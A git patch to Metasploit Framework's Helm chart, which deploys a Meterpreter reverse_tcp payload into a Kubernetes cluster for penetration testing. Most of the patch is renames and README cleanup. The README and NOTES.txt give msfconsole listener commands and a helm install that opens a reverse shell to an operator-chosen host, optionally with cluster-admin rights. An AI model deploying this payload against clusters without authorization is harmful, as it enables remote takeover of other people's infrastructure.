From ee093d0c21a6a4223520641845cd5d65ccfc5dc2 Mon Sep 17 00:00:00 2001 From: adfoster-r7 Date: Fri, 5 Nov 2021 14:22:45 +0000 Subject: [PATCH] Meterpreter Helm chart tweaks --- kubernetes/.gitignore | 2 +- kubernetes/Makefile | 15 ++--- kubernetes/README.md | 61 ++++++++----------- kubernetes/meterpreter/Chart.yaml | 5 +- kubernetes/meterpreter/templates/NOTES.txt | 9 ++- .../meterpreter/templates/deployment.yaml | 14 ++--- kubernetes/meterpreter/templates/rbac.yaml | 6 +- kubernetes/meterpreter/values.yaml | 14 ++--- 8 files changed, 59 insertions(+), 67 deletions(-) diff --git a/kubernetes/.gitignore b/kubernetes/.gitignore index ab517dbf38..b63ed2b9a9 100644 --- a/kubernetes/.gitignore +++ b/kubernetes/.gitignore @@ -1,3 +1,3 @@ metasploit/charts metasploit.yaml -meterpreter.yaml \ No newline at end of file +meterpreter.yaml diff --git a/kubernetes/Makefile b/kubernetes/Makefile index db9334a2b9..027b8cf6f0 100644 --- a/kubernetes/Makefile +++ b/kubernetes/Makefile @@ -1,26 +1,23 @@ -# -# -# .SECONDARY: .SECONDEXPANSION: lint-charts: ##@Lint Lint Helm Chart - helm lint meterpreter + helm lint meterpreter generate-deployment: ##@Generate Generate YAML based deployment - helm template meterpreter meterpreter --set lport="4444" --set lhost="1.1.1.1" > meterpreter.yaml + helm template meterpreter meterpreter --set lport="4444" --set lhost="1.1.1.1" > meterpreter.yaml install-meterpreter: ##@meterpreter Install meterpreter chart helm upgrade --create-namespace -i -n metasploit meterpreter ./meterpreter -delete-meterpreter: ##@meterpreter Delete meterpreter chart - helm -n metasploit delete meterpreter +delete-meterpreter: ##@meterpreter Delete meterpreter chart + helm -n metasploit delete meterpreter -create-kind-cluster: ##@Test create KIND cluster +create-kind-cluster: ##@Test create kind cluster kind create cluster --image kindest/node:v1.18.2 --name metasploit -delete-kind-cluster: ##@Test delete KIND cluster +delete-kind-cluster: ##@Test delete kind cluster kind delete cluster --name metasploit diff --git a/kubernetes/README.md b/kubernetes/README.md index 393f5a05a6..ca122ea9ab 100644 --- a/kubernetes/README.md +++ b/kubernetes/README.md @@ -1,46 +1,37 @@ +# Metasploit in Kubernetes -# Running Metasploit Framework Against Kubernetes +The most common workflow to test a Kubernetes environment with Metasploit is to target the Kubernetes API externally, +or through a compromised container - both of these workflows are currently supported directly within msfconsole. -Running metasploit framework against Kubernetes enables pentesters to security test cluster components such as the API Server, as well as internal application components or micro-services. +An alternative to compromising a Kubernetes container to gain a Meterpreter session is to install the `meterpreter` helm chart into +a Kubernetes environment directly. This newly opened Meterpreter session will act as the pivot point for running additional +Metasploit modules, similar to the behavior of compromising an existing Kubernetes container with msfconsole. -The installation chart (meterpreter) also offers to install & run a metasploit payload, that connects back to metasploit console. -The payload can be deployed with different priviliges and permissions with respect to Kubernetes node hosting metasploit payload, as well as Kubernetes API server itself - see 'priviliges' section under values.yaml +## Installation -```yaml -priviliges: - # Disable Kubernetes API Server Access - even to the discovery APIs - useServiceAccount: true - # Run metasploit framework as Kubernetes cluster admin (useServiceAccount must be true for this setting to be effective) - bindClusterRole: "" #cluster-admin +To install the Metasploit resources in to your Kubernetes environment: - # - # Priviliges related to node hosting metasploit Pod - # See: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ - podSecurityContext: {} - # fsGroup: 2000 - # Metasploit container security context - securityContext: {} - #allowPrivilegeEscalation: false - # capabilities: - # add: - # - NET_BIND_SERVICE - # drop: - # - all - #runAsNonRoot: true - #runAsUser: 1000 - #runAsGroup: 1000 +1. Make sure [Helm](https://helm.sh/) (version 3 or above) is [installed](https://helm.sh/docs/intro/install/) +2. Make sure you have an available Kubernetes cluster to deploy Metasploit. You can install a local Kubernetes cluster using [kind](https://kind.sigs.k8s.io/docs/user/quick-start/#installation) + You can create local kind cluster by running `make create-kind-cluster` +2. A penester should create a Metasploit listener from msfconsole: +``` +use payload/linux/x64/meterpreter/reverse_tcp +set LHOST x.x.x.x +set LPORT 4444 +to_handler ``` - -# Installation - -1. Make sure helm (version 3 or above) is [installed](https://helm.sh/docs/intro/install/) -2. Make sure you have an available Kubernetes cluster to deploy metasploit. You can install a local Kubernetes cluster using [KIND](https://kind.sigs.k8s.io/docs/user/quick-start/#installation) - > You can create local KIND cluster by running `make create-kind-cluster` 3. Install meterpreter helm chart by running: ```sh -export MSF_PORT="" -export MSF_IPADDRESS="" -helm upgrade --create-namespace -i -n metasploit meterpreter ./meterpreter --set lport=$MSF_PORT --set lhost=$MSF_IPADDRESS +export LHOST="x.x.x.x" +export LPORT="4444" +helm upgrade --create-namespace -i -n metasploit meterpreter ./meterpreter --set lhost=$LHOST --set lport=$LPORT ``` +4. If the listener from step 3 was created, ensure you now have a Meterpreter session in msfconsole + +## Privileges + +The Meterpreter container can be deployed with different privileges and permissions - see the `privileges` section within +[./meterpreter/values.yaml](values.yaml) for more details. diff --git a/kubernetes/meterpreter/Chart.yaml b/kubernetes/meterpreter/Chart.yaml index ced6648341..b217614179 100644 --- a/kubernetes/meterpreter/Chart.yaml +++ b/kubernetes/meterpreter/Chart.yaml @@ -10,9 +10,6 @@ keywords: - pentest - penetration testing home: https://www.metasploit.com/ -icon: https://www.metasploit.com/includes/images/metasploit-r7-logo.svg +icon: https://www.metasploit.com/includes/images/metasploit-og.png sources: - https://github.com/rapid7/metasploit-framework -maintainers: -- email: msfdev@metasploit.com - name: Metasploit Hackers \ No newline at end of file diff --git a/kubernetes/meterpreter/templates/NOTES.txt b/kubernetes/meterpreter/templates/NOTES.txt index b7739c6955..610ad69940 100644 --- a/kubernetes/meterpreter/templates/NOTES.txt +++ b/kubernetes/meterpreter/templates/NOTES.txt @@ -1 +1,8 @@ -Make sure meterpreter connected to your Metasploit Receive Handler running at {{ .Values.lhost}}:{{.Values.lport}} \ No newline at end of file +Make sure meterpreter connected to your Metasploit listener running at {{ .Values.lhost }}:{{ .Values.lport }} + +You can create a Metasploit listener with: + +use payload/linux/x64/meterpreter/reverse_tcp +set LHOST {{ .Values.lhost }} +set LPORT {{ .Values.lport }} +to_handler diff --git a/kubernetes/meterpreter/templates/deployment.yaml b/kubernetes/meterpreter/templates/deployment.yaml index 9725ee4e86..be632cb7c3 100644 --- a/kubernetes/meterpreter/templates/deployment.yaml +++ b/kubernetes/meterpreter/templates/deployment.yaml @@ -18,17 +18,17 @@ spec: imagePullSecrets: {{- toYaml . | nindent 8 }} {{- end }} - {{- if .Values.priviliges.useServiceAccount }} + {{- if .Values.privileges.useServiceAccount }} serviceAccountName: {{ include "meterpreter.fullname" . }} {{ else }} automountServiceAccountToken: false {{ end }} securityContext: - {{- toYaml .Values.priviliges.podSecurityContext | nindent 8 }} + {{- toYaml .Values.privileges.podSecurityContext | nindent 8 }} initContainers: - name: msfvenome image: "{{ .Values.image.repository}}:{{ .Values.image.tag }}" - imagePullPolicy: {{ .Values.image.pullPolicy }} + imagePullPolicy: {{ .Values.image.pullPolicy }} command: ["/bin/bash", "-c", "/tmp/meterpreter.sh"] env: - name: LHOST @@ -41,23 +41,23 @@ spec: - name: msfvenome mountPath: /tmp/meterpreter.sh subPath: meterpreter.sh - + containers: - name: {{ .Chart.Name }} image: gcr.io/google_containers/pause-amd64:3.0 - imagePullPolicy: {{ .Values.image.pullPolicy }} + imagePullPolicy: {{ .Values.image.pullPolicy }} command: ["/meterpreter/meterpreter"] tty: true stdin: true securityContext: - {{- toYaml .Values.priviliges.securityContext | nindent 12 }} + {{- toYaml .Values.privileges.securityContext | nindent 12 }} resources: {{- toYaml .Values.resources | nindent 12 }} volumeMounts: - name: meterpreter mountPath: /meterpreter - + restartPolicy: Always volumes: - name: meterpreter diff --git a/kubernetes/meterpreter/templates/rbac.yaml b/kubernetes/meterpreter/templates/rbac.yaml index a288d524d6..d605f4b52d 100644 --- a/kubernetes/meterpreter/templates/rbac.yaml +++ b/kubernetes/meterpreter/templates/rbac.yaml @@ -1,4 +1,4 @@ -{{- if .Values.priviliges.useServiceAccount -}} +{{- if .Values.privileges.useServiceAccount -}} apiVersion: v1 kind: ServiceAccount metadata: @@ -7,7 +7,7 @@ metadata: {{- include "meterpreter.labels" . | nindent 4 }} --- -{{- if ne .Values.priviliges.bindClusterRole "" -}} +{{- if ne .Values.privileges.bindClusterRole "" -}} apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: @@ -17,7 +17,7 @@ metadata: roleRef: apiGroup: rbac.authorization.k8s.io kind: ClusterRole - name: {{ .Values.priviliges.bindClusterRole }} + name: {{ .Values.privileges.bindClusterRole }} subjects: - kind: ServiceAccount name: {{ include "meterpreter.fullname" . }} diff --git a/kubernetes/meterpreter/values.yaml b/kubernetes/meterpreter/values.yaml index 13c8769bac..0a5b30d1f2 100644 --- a/kubernetes/meterpreter/values.yaml +++ b/kubernetes/meterpreter/values.yaml @@ -1,9 +1,9 @@ # Default values for meterpreter. #The IP Address the payload will connect to -lhost: +lhost: #The Port meterpreter will connect to -lport: +lport: image: repository: metasploitframework/metasploit-framework @@ -14,15 +14,15 @@ imagePullSecrets: [] nameOverride: "" fullnameOverride: "" -# Tune the priviliges your Kubernetes meterpreter will run with -priviliges: +# Tune the privileges your Kubernetes meterpreter will run with +privileges: # Disable Kubernetes API Server Access - even to the discovery APIs useServiceAccount: true - # Run metasploit framework as Kubernetes cluster admin (useServiceAccount must be true for this setting to be effective) - bindClusterRole: "" #cluster-admin + # Run Metasploit framework as Kubernetes cluster admin (useServiceAccount must be true for this setting to be effective) + bindClusterRole: "" #cluster-admin # - # Priviliges related to node hosting metasploit Pod + # Privileges related to node hosting metasploit Pod # See: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ podSecurityContext: {} # fsGroup: 2000